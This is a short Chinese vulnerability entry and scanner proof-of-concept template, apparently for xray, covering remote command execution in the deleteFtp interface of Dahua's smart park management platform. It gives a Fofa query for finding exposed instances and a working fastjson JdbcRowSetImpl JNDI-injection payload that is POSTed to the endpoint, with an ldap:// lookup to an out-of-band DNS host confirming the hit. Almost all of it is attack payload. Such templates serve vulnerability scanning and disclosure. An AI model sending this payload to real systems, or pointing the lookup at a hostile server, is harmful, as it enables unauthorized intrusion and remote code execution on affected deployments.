漏洞描述
大华智慧园区综合管理平台 deleteFtp 接口存在远程命令执行漏洞。
Fofa: body="/WPMS" || body="src=\"/WPMS/asset/common/js/jsencrypt.min.js\""
id: dahua-smart-park-deleteftp-rce
info:
name: 大华智慧园区综合管理平台 deleteFtp 远程命令执行
author: xy
severity: critical
verified: true
description: |-
大华智慧园区综合管理平台 deleteFtp 接口存在远程命令执行漏洞。
Fofa: body="/WPMS" || body="src=\"/WPMS/asset/common/js/jsencrypt.min.js\""
tags: dahua,rce
created: 2023/11/28
set:
oob: oob()
oobDNS: oob.DNS
rules:
r0:
request:
method: POST
path: /CardSolution/card/accessControl/swingCardRecord/deleteFtp
headers:
Content-Type: application/json
body: |
{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{oobDNS}}","autoCommit":true}}}
expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()